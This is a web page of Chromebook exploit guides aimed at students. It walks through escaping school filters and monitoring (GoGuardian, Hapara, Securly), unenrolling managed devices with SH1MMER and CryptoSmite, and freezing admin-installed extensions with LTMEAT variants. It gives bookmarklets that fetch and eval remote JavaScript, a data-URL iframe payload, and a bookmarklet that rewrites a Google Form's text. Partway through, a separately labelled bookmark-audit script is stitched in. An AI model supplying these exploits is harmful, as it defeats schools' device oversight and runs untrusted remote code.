<p>Also, remember that you can use the arrow keys on your keyboard to go back and forward pages.</p>
<h2 id="method-1">Method 1</h2>
<p>If you didn't see the start, just note that you need the IPSD email of someone else (you don't need the password or anything else). If you don't have this or want to do it faster, use Method 2. Method 1 will be unblocked for a long time (I think).</p>
<ol>
<li>Go to chrome://chrome-signin</li>
<li>Put in the IPSD email</li>
<li>Press "Students: I Forgot My Password"</li>
<li>Press the blue "Click here"</li>
<li>Click on the link in the first step in the website (says "Parent will visit ParentVUE at" and the link)</li>
<li>Scroll and press "Android App"</li>
<li>At the very top right you will see a little thingy that looks like that, click it and type "Google"
<br> <img style="width:200px !important;" src="./assets/search.png" alt="Search thing"></li>
<li>Choose the first one</li>
<li>Go to the "Data safety" section and press on "See details"</li>
<li>Scroll to the very bottom and click on <code class="normlcode">privacy policy</code></li>
<li>Scroll to the very bottom and press "Google"</li>
</ol>
<p>You are done. Now you are in Google. The only benefit of this method is that it's not gonna be blocked for some time.</p>
<h2 id="method-2">Method 2</h2>
<ol>
<li>Go to chrome://chrome-signin</li>
<li>Put in "<a href="mailto:google@d11.org">google@d11.org</a>"</li>
<li>Press "Sign-in options"</li>
<li>Press "Sign in with GitHub"</li>
<li>Press "Forgot password?" (YOU NEED TO DO THIS)</li>
<li>Press the GitHub cat at the top.</li>
<li>Press the search thing (top right) and type in <code class="normlcode">doxrjig</code> and press the first thing that comes up.</li>
</ol>
<p>You are done. Press on any of the links or if you have a specific link you need to get to, use the specific site switcher (don't forget https:// in front of the URL)</p>
<h2 id="method-3-shortest-to-perform-best">Method 3 (shortest to perform, best)</h2>
<ol>
<li>Go to <code class="normlcode">chrome://chrome-signin</code></li>
<li>Type in someone else's email, ex. <code class="normlcode">[email protected]</code></li>
<li>When it takes you to the log-in page, type in YOUR credentials</li>
<li>After pressing Enter on the password, it should return you to a 404 page. Click the Google logo, and it should take you to a Google page.</li>
<li>This is the unblocked browser. Profit =)</li>
</ol>
<h1 id="ipsd-pass">IPSD-pass</h1>
<p>This method uses a few links in IPSD's login screen to get to a different page unblocked.</p>
<blockquote>
<p>This bypass isn't very good since you can't use the arrow keys to go back and forward in pages, and some sites like Snapchat are still blocked, but that literally can't be bypassed.</p>
</blockquote>
<p>Steps:</p>
<ol>
<li>Log out</li>
<li>You should see "add a new user" on the bottom left, click on that.</li>
<li>In the login screen, press "Students: I Forgot My Password"</li>
<li>Click the blue "Click here" in the sentence that says <code class="normlcode">Click here for step-by-step instructions on using this form.</code></li>
<li>You will find a sentence that says <code class="normlcode">Parent will visit ParentVUE at https://il-ipsd-psv.edupoint.com/PXP2_Login_Parent.aspx and log in with their ParentVUE username/password.</code>, click on the link (should bring you to StudentVUE)</li>
<li>Press "iPhone App"</li>
<li>Press on the search button (top right) and type in "DuckDuckGo," you'll find a thing that says "DuckDuckGo Private Browser," click on it.</li>
<li>You'll find a section that says "App Privacy," and in that you'll find a link that says "For more information, see the developer’s privacy policy." Click on it</li>
<li>You'll find an icon on the top left, click on it</li>
</ol>
<p>Now you are done. Use DDG like how you use Google, but remember that once you click on a site you can't go back because this exploit is bad.</p>
<h1 id="evil-printer-unblocking">Evil Printer Unblocking</h1>
<h3 id="this-method-can-unblock-your-chromebook-and-all-it-takes-is-printing">This method can unblock your chromebook, and all it takes is printing.</h3>
<br>
<blockquote>
<p>The only problem with this is that there will be a little bit of lag while this is running. This exploit may randomly stop working, just do the entire thing again.</p>
</blockquote>
<ol>
<li>DON'T CLICK ON THIS LINK (it won't work). Instead, drag this link to your tabs, and a lot of code should pop up.</li>
</ol>
<p>Link: <a target="_blank" href="chrome-extension://adkcpkpghahmbopkjchobieckeoaoeem/main.js" id="myLink">Drag me!</a></p>
<p>Ex:
<br>
<img src="./assets/drag.gif"></p>
<ol start="2">
<li>Press CTRL+P to bring up the printing page. Set pages to "All" and Layout to "Landscape." Also, copy these settings down below as well. This will create a lot of lag, and you won't be able to open sites right now.</li>
</ol>
<img style="width: 300px;" src="./assets/idk.png">
<p><strong>Make sure that you copied all of those settings.</strong></p>
<ol start="3">
<li><p>Press the refresh button on your chromebook's keyboard (don't close that printing screen), then do ALT + D and ALT + Enter. There should be a new tab that opens; don't close this tab! Going on that tab is a bad idea too since it can lag you. </p>
</li>
<li><p>Copy this URL, open a new tab, and paste it in the same place you would paste a normal URL in.</p>
</li>
</ol>
<p><code class="normlcode">chrome://extensions/?id=adkcpkpghahmbopkjchobieckeoaoeem</code></p>
<ol start="5">
<li><p>Scroll down until you see <code class="normlcode">Allow access to file URLs</code> and flip the switch thing next to it, and then do it again so the switch isn't blue anymore.</p>
</li>
<li><p>If you did everything correctly, the old page closed but the new page is still open and it is still loading. Now your chromebook should be unblocked. You will feel a bit of lag but that's it. If you want to stop the exploit and go back to normal without lag, just enter <code class="normlcode">chrome://restart</code> in the place where you type URLs, and your chromebook will immediately restart.</p>
</li>
</ol>
<h1 id="ltvegan">LTVegan</h1>
<blockquote>
<p>Hang the blocker and be unblocked.</p>
</blockquote>
<ol>
<li>Open <code class="normlcode">chrome://extensions/?id=adkcpkpghahmbopkjchobieckeoaoeem</code> (tab 1)</li>
<li>Open <code class="normlcode">chrome-extension://adkcpkpghahmbopkjchobieckeoaoeem/main.js</code> in a new tab (tab 2)</li>
<li>Go to tab 2 and do CTRL + A to copy all of the code on the site.</li>
<li>Drag the code to the top (this might do a google search with all of the code, that's fine). The chromebook will freeze for a little bit.</li>
<li>Right-click on tab 1 once you stop freezing and press the duplicate button.</li>
<li>Go to tab 2 and press the switch that says "Allow access to file URLs" (multiple times). One of the tabs that were duplicated will close, the other won't. DON'T CLOSE THE TAB THAT'S LOADING.</li>
<li>Close the Google tab, and close tab 1, and you should be unblocked!</li>
</ol>
<p>If BOTH tabs of tab 2 (the original and duplicated) close, you did something wrong probably. Just try again or something. (Unless it's patched lol)</p>
<h2 id="cryptosmite-unenrollment">CryptoSmite <em>Unenrollment</em></h2>
<p><strong>CryptoSmite</strong> is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by FWSmasher and released on <strong>March 9th, 2024</strong>.</p>
<p><strong>This exploit has been patched since Chrome OS 120.</strong></p>
<h3 id="finding-kernver">Finding Kernver</h3>
<p>If you're on v120 or higher, you need to downgrade in order to use CryptoSmite. To do this, you first need to check your <code class="normlcode">kernver=</code> in Recovery Mode.</p>
<ol>
<li>Boot into Recovery Mode<ul>
<li>Hold ESC + Refresh + Power for 2 or 3 seconds.</li>
<li>You should be on an "Insert Recovery Media" or "Let's step you through the recovery process" screen.</li>
</ul>
</li>
<li>Press TAB and look at the last digit of the <code class="normlcode">kernver=</code> line</li>
</ol>
<ul>
<li><p><code class="normlcode">kernver=</code> ends with a 2! <br />
Congratulations, you can downgrade to v119 or lower! Follow the instructions at <a href="#downgrading-change-versions">Downgrading <em>Change versions</em></a> on how to downgrade.</p>
</li>
<li><p><code class="normlcode">kernver=</code> ends with a 3! <br />
Sorry, you can't downgrade to v119 or lower. Wait for a new unenrollment exploit or do a <a href="https://blog.darkn.bio/blog/3-the-tsunami"><strong>dangerous</strong> hardware modification.</a></p>
</li>
</ul>
<h3 id="using-cryptosmite">Using CryptoSmite</h3>
<ol>
<li>Download a SH1MMER Prebuilt image here: <a href="https://dl.darkn.bio/SH1mmer/Prebuilt/">dl.darkn.bio</a></li>
<li>Disable OS verification <em>(blocked or not, doesn't matter)</em>, and boot into the shim.</li>
<li>Navigate to Payloads and navigate to CryptoSmite using the arrow keys, then press <code class="normlcode">Enter</code>.</li>
<li>Type in <code class="normlcode">Y</code> then press enter, and it'll automatically reboot upon completion.</li>
<li>Proceed through the setup partially till you get to the Add Account Screen.<ul>
<li>If you see an update prompt, reboot then press <code class="normlcode">CTRL + ALT + E</code> on the Wi-Fi screen.<ul>
<li>This <em>should</em> allow skipping the update, or make it not appear at all.</li>
</ul>
</li>
</ul>
</li>
<li>Powerwash the Chromebook at the "Add Account" screen. Afterwards, it'll be fully unenrolled.</li>
</ol>
<h3 id="further-reading">Further Reading</h3>
<ul>
<li><a href="https://github.com/FWSmasher/CryptoSmite">Repository</a> </li>
<li><a href="https://blog.coolelectronics.me/breaking-cros-2/">Writeup</a></li>
<li><a href="https://exploitingchromium.blogspot.com/">Official Blogspot</a></li>
</ul>
<h2 id="sh1mmer-unenrollment">SH1MMER <em>Unenrollment</em></h2>
<p><strong>SH1MMER</strong> is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by the Mercury Workshop team and was released on <strong>January, Friday the 13th, 2023</strong>.</p>
<p>Due to the detail this exploit requires, please check out the official website: <a href="https://sh1mmer.me">sh1mmer.me</a></p>
<p><strong>This exploit has been patched since Chrome OS 111.</strong></p>
<h3 id="note">Note</h3>
<p>Mercury Workshop received a notice from Google™️ that they had to take down their builder and shims. Currently, it is being rehosted by multiple community members.</p>
<ul>
<li><a href="https://darkn.bio/sh1mmer/builder">Wax4Web</a></li>
<li><a href="https://dl.darkn.bio/SH1mmer">RMA shims</a></li>
<li><a href="https://dl.darkn.bio/SH1mmer/Prebuilt">Prebuilt shims</a></li>
</ul>
<h3 id="further-reading-1">Further Reading</h3>
<ul>
<li><a href="https://github.com/MercuryWorkshop/sh1mmer">Repository</a> </li>
<li><a href="https://sh1mmer.me/">Official Website</a></li>
<li><a href="https://blog.coolelectronics.me/breaking-cros-2/">Writeup</a></li>
</ul>
<h2 id="hapara-focus-session-bypass">Hapara Focus Session Bypass</h2>
<h3 id="what-is-it">What is it?</h3>
<p>An exploit that allows for access to sites outside of the Hapara Focus Session</p>
<h3 id="how-to-use-it">How to use it?</h3>
<p><strong>Your teacher may still be able to see your screen, but they won't think you are doing anything wrong because of the focus session.</strong></p>
<p><strong>YOU MUST HAVE data: LINKS ALLOWED. IF YOU DON'T HAVE THOSE ALLOWED, THIS WILL NOT WORK</strong>.</p>
<ol>
<li>create a bookmark named anything, head to the URL section, and paste this in it: <code class="normlcode">data:text/html,<!DOCTYPE html> <html> <head> <title>full screen iframe</title> <style type="text/css"> html { overflow: auto; } html, body, div, iframe { margin: 0px; padding: 0px; height: 100%; border: none; } iframe { display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden; } </style> </head> <body> <iframe src="https://www.google.com.au" frameborder="0" marginheight="0" marginwidth="0" width="100%" height="100%" scrolling="auto" id="google"> </iframe> </body> </html></code></li>
<li>When you are in a focus session, click the bookmark, and it will open a Google tab. (If it says that it doesn't work, then you can download the <a href="./assets/HaparaBypass-Iframe.html">Iframe</a>.)</li>
<li>enjoy not having to listen to a lecture from your teacher!
(Credit to <a href="https://github.com/HeroLink6">Hero Link 6</a> For finding this exploit, you can find more info on his GitHub repository <a href="https://github.com/HeroLink6/Hapara-Focus-Session-Bypass/tree/main">here</a>.)</li>
</ol>
<h2 id="guardiantabcrash-unrestricted-browsing">GuardianTabCrash <em>Unrestricted browsing</em></h2>
<h3 id="what-is-it-1">What is it?</h3>
<p>An exploit that allows for unrestricted internet access outside of GoGuardian's control</p>
<h3 id="how-to-use-it-1">How to use it?</h3>
<p><strong>Teachers can still see your screen, but they can't block or close any of your tabs.</strong></p>
<p><strong>YOUR TEACHER NEEDS TO HAVE SET A TAB LIMIT. TRY OPENING TONS OF TABS TO CONVINCE THEM TO ENABLE TAB LIMITS</strong>.</p>
<ol>
<li>create a bookmark named anything: <code class="normlcode">javascript: window.onbeforeunload = ()=>{return false;}</code></li>
<li>Hold down CTRL and then SPAM CLICK the bookmark until you're well above the tab limit, opening a bunch of <code class="normlcode">about:blank</code> pages.</li>
<li>It might ask if you want to leave this page; this is GoGuardian trying to close it. Say No, and click <code class="normlcode">Prevent from creating additional dialogues</code>.</li>
<li>Enjoy your unblocked stay!</li>
</ol>
<h4 id="discovered-by-py660">Discovered by @py660</h4>
<h2 id="skiovox-unrestricted-browsing">Skiovox <em>Unrestricted browsing</em></h2>
<h3 id="what-is-it-2">What is it?</h3>
<p>An exploit that allows for browsing within a completely unblocked Chrome
browser. It works on ChromeOS 118 and a wide range of previous versions.</p>
<ul>
<li>Skiovox utilizes a bug in kiosk apps</li>
<li>Very similar to a bug from 3 years ago</li>
</ul>
<p>Within the unblocked browser, you can:</p>
<ul>
<li>Install extensions</li>
<li>Bypass pretty much all blocks</li>
<li>Do whatever the honk you want</li>
</ul>
<h3 id="how-to-use-it-2">How to use it</h3>
<p>Bypassi made a wonderful slideshow for you goofballs to follow and view using any of the links below!</p>
<ul>
<li><a href="https://www.skiovox.com/skiovox.pdf">https://www.skiovox.com/skiovox.pdf</a></li>
<li><a href="https://drive.google.com/file/d/1tl8eP26MFRejHO38H5HwMLl2VaQrtn0Z/preview">https://drive.google.com/file/d/1tl8eP26MFRejHO38H5HwMLl2VaQrtn0Z/preview</a></li>
<li><a href="https://ftp.3kh0.net/Archive/skiovox.pdf">https://ftp.3kh0.net/Archive/skiovox.pdf</a></li>
<li><a href="https://1drv.ms/b/s!Ais5N3vPLTEMh8poZbywnNWdMUrhUA?e=MaCHBx">https://1drv.ms/b/s!Ais5N3vPLTEMh8poZbywnNWdMUrhUA?e=MaCHBx</a></li>
<li><a href="./assets/skiovox.pdf"><code class="normlcode">assets/skiovox.pdf</code></a></li>
</ul>
<h3 id="further-reading-2">Further Reading</h3>
<ul>
<li><a href="https://github.com/bypassiwastaken/skiovox-helper">Skiovox helper</a></li>
</ul>
<h2 id="ltbeef-disable-extensions">LTBEEF <em>Disable extensions</em></h2>
<p>LTBEEF (Literally The Best Exploit Ever Found) is an exploit found by Bypassi (Bypassi#7037) in September 2022 and is a great way to disable spyware installed on your Chromebook by your school.</p>
<h3 id="how-to-use-ltbeef">How to use LTBEEF</h3>
<p>Use either of the two bookmarklets below. The instructions are the same for both.</p>
<ol>
<li>Copy the JavaScript code from either of the two bookmarklets below</li>
<li>Make a new bookmark on your Chromebook</li>
<li>Put the JavaScript code in the URL section of the bookmark</li>
<li>Visit <a href="https://chrome.google.com/webstorex">https://chrome.google.com/webstorex</a>. (This is a 404 page, and that is ok.)</li>
<li>If that page does not work, you can just change the end of the URL to anything else, like <a href="https://chrome.google.com/webstoreYAAAAAAAAAAAAAAAY">https://chrome.google.com/webstoreYAAAAAAAAAAAAAAAY</a></li>
<li>Click on the bookmark you made</li>
<li>Switch off the extensions you don't want to have anymore.</li>
<li>You're done! The extension should now be disabled.</li>
</ol>
<p><strong>Please note that this exploit has been patched for quite some time</strong></p>
<h3 id="bookmarklets">Bookmarklets</h3>
<h4 id="compactcow-gui">CompactCow GUI</h4>
<p><img src="./assets/compactcow.png" alt="compactcowgui"></p>
<pre><code class="language-js">javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
</code></pre>
<h4 id="ingot">Ingot</h4>
<p><img src="./assets/ingot.png" alt="ingot"></p>
<pre><code class="language-js">javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
</code></pre>
<h2 id="lomoh-disable-extensions">LoMoH <em>Disable extensions</em></h2>
<p>Formerly named "Locked Mode Hack," this Chrome OS exploit uses the locked mode feature to soft disable force-enabled extensions on managed accounts (Excluding Hapara Highlights and Read&Write if installed).</p>
<p><strong>This exploit is patched in Chrome OS 111</strong></p>
<h3 id="bookmarklet-version-original-and-nicer">Bookmarklet Version (Original and nicer)</h3>
<pre><code class="language-js">javascript:(function(){if (location.hostname == "docs.google.com") {document.body.innerHTML = document.body.innerHTML.replace("Locked mode is on", "Are you ready to turn off extensions?%22);%20document.body.innerHTML%20=%20document.body.innerHTML.replace(%22You%20have%20already%20opened%20and%20closed%20this%20quiz.%20Opening%20this%20quiz%20again%20will%20notify%20the%20form%20owner%20by%20email.%22,%20%22This%20will%20reload%20all%20tabs%20in%20your%20browser%22);%20var%20button%20=%20document.getElementById(%27mG61Hd%27);%20button.innerHTML%20=%20button.innerHTML.replace(%22Start%20Quiz%22,%20%22Disable%20Extensions%22);%20button.addEventListener(%27click%27,%20function(event){window.close();})}%20else%20{window.open(%22https://docs.google.com/forms/u/0/d/e/1FAIpQLSf5EYwrSUjmQhBOasMpORZy80eBCYb7qCpEwWNoRPUGyObGMA/startquiz%22);}})()
</code></pre>
<h3 id="websitehtml-version-for-blocked-bookmarklets">Website/HTML Version (for blocked bookmarklets)</h3>
<p><a href="https://ashtondavies.github.io/LoMoH?unlock">LoMoH HTML</a>
<strong>Additional Notes:</strong>
You must create your link with the button on the page for locked mode to work within your organization/district.
If this is patched for you, you will get rickrolled attempting to perform this exploit. This is just a heads-up for those who do happen to read this.</p>
<p><a href="https://github.com/AshtonDavies/LoMoH">GitHub Repository</a></p>
<h2 id="ltmeat-disable-extensions">LTMEAT <em>Disable extensions</em></h2>
<p><strong>L</strong>iterally <strong>T</strong>he <strong>M</strong>eatiest <strong>E</strong>xploit of <strong>A</strong>ll <strong>T</strong>ime</p>
<ol>
<li>Find a page belonging to the extension you want to disable. <code class="normlcode">chrome://extensions</code>, <code class="normlcode">chrome://extensions-internals</code>, and <code class="normlcode">chrome://process-internals</code> are all good places to find your extension's ID (a 32-character lowercase string). You can also do a simple Google search. Once you have your ID, substitute it into the hostname in the URL below:</li>
</ol>
<pre><code class="normlcode">chrome-extension://extensionidhereblahblah/manifest.json
</code></pre>
<p>For some filters like Securly, the block screen is already an extension page. </p>
<ol start="2">
<li>Bookmark the extension page (bookmark A) if you wish. Then, bookmark <code class="normlcode">chrome://kill</code> (B) and <code class="normlcode">chrome://hang</code> (C). </li>
<li>On the extension page (A), click the <code class="normlcode">chrome://kill</code> bookmark (B). The page should crash. You should already have the next step prepared. </li>
<li>Instantly start spamming <code class="normlcode">chrome://hang</code> (bookmark C) and quickly reload the page while spamming (ideally with the refresh key on your keyboard or <code class="normlcode">ctrl</code>+<code class="normlcode">R</code>). You should have reloaded within one or two seconds of killing the page. </li>
<li>If the extension page (bookmark A) no longer loads, then LTMEAT worked! You can close your tabs, and the extension will be dead. If nothing loads, you probably reloaded too late or spammed too slowly. This isn't rocket science! Restart your computer to revert back to normal.</li>
</ol>
<p>Exploit made by <a href="https://buymeacoffee.com/bypassi">Bypassi#7037</a>, <a href="https://ltmeat.bypassi.com">learn why this works</a>.</p>
<h3 id="help-me-im-an-idiot">"Help me! I'm an idiot!"</h3>
<p>I had far too much faith in society when making this page. Some of you skids out there are really, really stupid and also can't read. So here are the answers to some commonly asked questions. </p>
<p><strong>How do I get an extension ID?</strong></p>
<p>Okay, fair. Extension IDs are leaked in a couple of places. Generally, the best way to get them is to go to extension settings and copy the URL query value.</p>
<p><strong>It says blocked by client?</strong></p>
<p>That's the message you get when you try to visit a page belonging to an extension that doesn't exist. The error message (<code class="normlcode">ERR_BLOCKED_BY_CLIENT</code>) is highly misleading. Nobody blocked it. You need to find the correct extension ID (see above).</p>
<p>If you got this because you tried to visit the <code class="normlcode">extension_id_here</code> example URL, you should be extremely ashamed of yourself. Please change and grow as a person.</p>
<p><strong>I don't have a bookmarks bar!!!!</strong></p>
<p>First, try running ctrl+shift+B. If that doesn't work, go to <code class="normlcode">chrome://settings</code> and turn on the "home button" feature, then set it to <code class="normlcode">chrome://hang</code>. A home icon in the top left should appear to the right of your refresh icon. Use that instead of bookmark C.</p>
<p>There is a version where you don't need bookmarklets, but I am currently gatekeeping it (L). Check this site daily to see if new alternate instructions have been posted. </p>
<p><strong>I disabled an extension, but now I can't load websites!</strong></p>
<p>If you just read the write-up, you'd know this would happen if the extension's background page loaded and its listeners were already initialized before you used <code class="normlcode">chrome://hang</code>. You can double-check whether the extension is listening using <code class="normlcode">chrome://extensions-internals</code>, assuming you have a few brain cells in your head.</p>
<p>Anyway, no listeners mean you were too slow. Either you waited more than three seconds between bookmark B and reloading the page, or you needed to be spamming bookmark C faster. The most reliable fix is to restart your computer and try again. Try to match the pace of the gif below: (note the reload) </p>
<p><img src="./assets/abc.gif" alt="image"></p>
<p><strong>The bookmarks don't do anything when I click them!</strong></p>
<p>Might be admin-blocked. Either be smart enough to figure out another way or check this site daily to see if new alternate instructions have been posted.</p>
<p><strong>I disabled the extension. Why is some stuff still blocked?</strong></p>
<p>I have bad news for you... not all filters are Chrome Extensions. Again, make sure the extension pages (like bookmark A) are frozen before you assume that your skiddy self successfully did the exploit. </p>
<p><a href="https://ltmeat.bypassi.com/alt/1.txt">Baby method for slow people</a></p>
<h2 id="ltmeat-flood-freeze-extensions">LTMEAT Flood <em>Freeze extensions</em></h2>
<ol>
<li>Create a bookmark folder and paste the extension page many times. (About 800 minimum is recommended, assuming your Chromebook is average school quality) You should add the extension page at the beginning of the folder.</li>
<li>Right-click and open all in a new window.</li>
<li>Close the window with all those tabs.</li>
<li>Open the folder in a new window again, and Chrome should hang those tabs to take care of the old ones in the background that were just closed. (Equivalent to the duplicate tab step in Bypassi's method)</li>
<li>Flip the Allow access to file URLs switch in the extension settings, and then you've bypassed the patch, and the exploit is working.</li>
</ol>
<p>Close everything and you're good to go. If it didn't work, try adjusting the number of open tabs. This is the LTMEAT Flood Method, and also unofficially called Alternate Method # 2. Enjoy a much longer life of LTMEAT!</p>
<p><strong>Not working?</strong> Ensure you open a large set, but not too large, of extension tabs (_/generated_background_page.html or /manifest.json) for a permanent freeze.</p>
<h2 id="temp-tmeat-freeze-extensions">Temp TMEAT <em>Freeze extensions</em></h2>
<p>A method of using LTMEAT that does not require <code class="normlcode">chrome://</code> URLs. This works by using 80-150 tabs to soak up memory.</p>
<ol>
<li>Create a bookmark with the link <code class="normlcode">chrome://extensions/?id=extension_id_here</code> and name it <code class="normlcode">Kill switch</code>.</li>
<li>Create a new bookmark folder. Name it <code class="normlcode">spam.js</code>. Next, paste this link into your browser: <code class="normlcode">chrome-extension://extension_id_here/background.js</code></li>
<li>Then right-click on your folder and hit <code class="normlcode">Add Page</code>. Press Enter.</li>
<li>Right-click on the folder again and hit <code class="normlcode">Bookmark Manager</code>. You should see your page. Click on it and hit <code class="normlcode">Ctrl</code>+<code class="normlcode">C</code>. Press <code class="normlcode">Ctrl</code>+<code class="normlcode">V</code> until you have 38 of them.</li>
<li>Go to a new tab and right-click your folder. Press <code class="normlcode">Open All (38)</code>.</li>
<li>Repeat step 3, then click on one of the tabs from this batch. Wait until the <code class="normlcode">This page is taking too long</code> popup appears. This will take 30-60 seconds. If it doesn’t, do <code class="normlcode">chrome://restart</code> and go back to step 2. Add 3-4 more pages to the folder.</li>
<li>Once the popup happens, right-click on one of the tabs closest to the right of the screen and hit <code class="normlcode">Duplicate</code>. Then, go to your <code class="normlcode">Kill switch</code> bookmark and look for a switch to flip, <code class="normlcode">Allow Access to File:// urls</code>. Then, click on the leftmost extension tab (one that opened from the main.js folder) and click <code class="normlcode">Close all tabs to the right</code>. KEEP THIS TAB OPEN!!!</li>
</ol>
<p>Tips: Go to <code class="normlcode">chrome://settings/performance</code> and turn Memory Saver off, and in the box where it says <code class="normlcode">Keep these sites always active</code>, paste in the extension URL. I’ve noticed clicking on one of the tabs from the second batch seems to help with reliability.</p>
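<p>The bookmark-based methods on this page (bookmarklets, <code class="normlcode">chrome://kill</code> and <code class="normlcode">chrome://hang</code> bookmarks, folders packed with copies of one extension page) leave a recognisable shape in a profile's bookmark tree. The following audit is an added example, not code from the original page or from any of the projects it credits; it assumes input in the JSON layout of Chrome's <code class="normlcode">Bookmarks</code> profile file, and the threshold, function names and sample tree are constructed for illustration.</p>

```javascript
'use strict';
// Added example (not from the original page): walk a bookmark tree and report
// the bookmark shapes this page relies on.

// Browser debug/restart URLs that the page asks users to bookmark.
const DEBUG_URLS = new Set(['chrome://kill', 'chrome://hang', 'chrome://restart']);
// Assumption: this many copies of one extension page in a single folder is a flood.
const DUPLICATE_THRESHOLD = 20;

// Classify a single bookmark URL; returns null for ordinary bookmarks.
function classify(url) {
  const u = String(url).trim().toLowerCase();
  if (u.startsWith('javascript:')) return 'bookmarklet';
  if (u.startsWith('data:')) return 'data-url';
  if (DEBUG_URLS.has(u.replace(/\/+$/, ''))) return 'debug-url';
  if (u.startsWith('chrome-extension://')) return 'extension-page';
  return null;
}

// Returns a list of findings: { kind, path, name?, url, count? }.
function auditBookmarks(tree) {
  const findings = [];

  function walk(node, path) {
    if (node.type === 'url') {
      const kind = classify(node.url || '');
      // A single extension-page bookmark is not reported; floods are handled per folder.
      if (kind && kind !== 'extension-page') {
        findings.push({ kind, path: path.join('/'), name: node.name, url: node.url });
      }
      return;
    }
    const children = Array.isArray(node.children) ? node.children : [];
    const here = path.concat(node.name || '');

    // Count identical extension-page URLs directly inside this folder.
    const counts = new Map();
    for (const c of children) {
      if (c.type === 'url' && classify(c.url || '') === 'extension-page') {
        counts.set(c.url, (counts.get(c.url) || 0) + 1);
      }
    }
    for (const [url, count] of counts) {
      if (count >= DUPLICATE_THRESHOLD) {
        findings.push({ kind: 'extension-page-flood', path: here.join('/'), url, count });
      }
    }
    for (const c of children) walk(c, here);
  }

  // The roots object can hold non-folder values; skip anything that is not a node.
  for (const root of Object.values(tree.roots || {})) {
    if (root && typeof root === 'object') walk(root, []);
  }
  return findings;
}

// Constructed sample tree. The extension ID is the page's own placeholder.
const SAMPLE_TREE = {
  roots: {
    bookmark_bar: {
      type: 'folder',
      name: 'Bookmarks bar',
      children: [
        { type: 'url', name: 'Homework', url: 'https://classroom.google.com/' },
        { type: 'url', name: 'x', url: 'javascript: window.onbeforeunload = ()=>{return false;}' },
        { type: 'url', name: 'C', url: 'chrome://hang' },
        { type: 'url', name: 'A', url: 'chrome-extension://extension_id_here/manifest.json' },
        {
          type: 'folder',
          name: 'spam.js',
          children: Array.from({ length: 38 }, () => ({
            type: 'url',
            name: 'background.js',
            url: 'chrome-extension://extension_id_here/background.js',
          })),
        },
      ],
    },
    other: { type: 'folder', name: 'Other bookmarks', children: [] },
  },
};

for (const f of auditBookmarks(SAMPLE_TREE)) {
  console.log(`${f.kind}\t${f.path}\t${f.count ? 'x' + f.count : f.name}`);
}
```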
<h2 id="baby-ltmeat-freeze-extensions">Baby LTMEAT <em>Freeze extensions</em></h2>
<p>BABY METHOD
FOR THE TECHNOLOGICALLY CHALLENGED.</p>
<ol>
<li>Follow step one of the original instructions to find a page belonging to the Chrome extension you want to disable.</li>
<li>Visit that <code class="normlcode">chrome-extension://extension_id_here</code> page, then type <code class="normlcode">chrome://hang</code> in the URL bar of that tab. It should start loading infinitely.</li>
<li>Right-click the tab and duplicate it. Don't close anything.</li>
<li>Go to the <code class="normlcode">chrome://extensions</code> page for the blocker extension you want to disable.</li>
<li>If that page has any switch, such as <code class="normlcode">Allow access to file URLs</code>, click that switch. If you don't see any clickable switches, this exploit will not work.</li>
<li>The extension should now be broken, assuming you clicked the switch! Only one of the two duplicate tabs should be left standing. You can close your tabs now.</li>
</ol>
<h2 id="ltmeat-print-freeze-extensions">LTMEAT Print <em>Freeze extensions</em></h2>
<ol>
<li>Find your extension's largest file. This can usually be found by using <a href="https://robwu.nl/crxviewer/">Rob Wu's crxviewer</a></li>
<li>Go to that page and run <code class="normlcode">Ctrl</code>+<code class="normlcode">P</code>. A print window should show up, with several pages in the top right.</li>
<li>Do everything you can to increase that number. Shrink down margins, change layout to landscape, anything you can. The higher you get that number, the longer the effect will last.</li>
<li>Reload. The page should start hanging.</li>
<li>Go to your extension's settings page, <code class="normlcode">chrome://extensions</code>.</li>
<li>Duplicate your "printing" tab, and go back to your extension's settings page.</li>
<li>Flip any switch you can find there. Usually, there'll be one titled <code class="normlcode">Allow access to file URLs</code>.</li>
</ol>
<h3 id="where-do-i-find-my-extensions-manifestjson">Where do I find my extension's manifest.json?</h3>
<p>First, find your extension's ID. This is a 32-character code found on your extension's settings page, normally near or at the top. </p>
<p><img src="./assets/find_ext_id.png" alt="Where do I find my extension ID"></p>
<p>Then go to <code class="normlcode">chrome-extension://extension_id_here/manifest.json</code></p>
<p>Credit to Bypassi for the original LTMEAT framework, and to Swordmaster4321 for discovering that pages can be hung with printing.</p>
<h2 id="dextensify-freeze-extensions">Dextensify <em>Freeze extensions</em></h2>
<p>Dextensify is an exploit that lets you disable most admin-installed Chrome extensions from any webpage. It can be used from regular websites, HTML files, and data URLs.</p>
<p>Go here and follow instructions: <a href="https://dextensify.pages.dev/main">Dextensify Main HTML</a>, or download the file here <a href="Dextensify.html">Dextensify.html</a></p>
<p>Download mirror: <a href="https://ftp.3kh0.net/Archive/Dextensify/">ftp.3kh0.net</a></p>
<p>Made by <a href="https://ading.dev/">ading2210</a></p>
<h2 id="jpcmg-ltbeef-w-service-workers">JPCMG <em>LTBEEF w/ Service workers</em></h2>
<p><strong>Requirements</strong></p>
<ul>
<li><code class="normlcode">chrome://serviceworker-internals</code></li>
<li>Inspect element</li>
</ul>
<ol>
<li>Go to <code class="normlcode">chrome://serviceworker-internals</code></li>
<li>Find your extension; this exploit will not work if you can't find it. Some extensions will not work with this exploit.</li>
<li>Hit the start button, then the <code class="normlcode">Inspect</code> button, and execute the LTBEEF code:</li>
</ol>
<pre><code class="language-js">chrome.management.setEnabled('extension_id_here',false)
</code></pre>
<p><img src="./assets/jpcmg.png" alt="Screenshot example"></p>
<p>Thanks to Nyaann#3881 for this exploit</p>
<h2 id="corkey-corrupt-extensions">Corkey <em>Corrupt extensions</em></h2>
<p>Corkey does indeed include power washing the Chromebook, which wipes local data including everything under "My files," so I suggest you select everything you want to keep and drag it to Google Drive as a backup, if that's available for your account.</p>
<ol>
<li>Esc+Refresh+Power and re-enroll (Enter recovery page), or you can just powerwash.</li>
<li>Log into your Chromebook, immediately turn off WiFi, and press Refresh+Power (instant restart).</li>
<li>Log back into your Chromebook with the WiFi off. Look for an option to log in as an existing user and click that.</li>
<li>Go to <code class="normlcode">chrome://extensions</code>, turn on WiFi, and wait for your school's blocking extension to appear.</li>
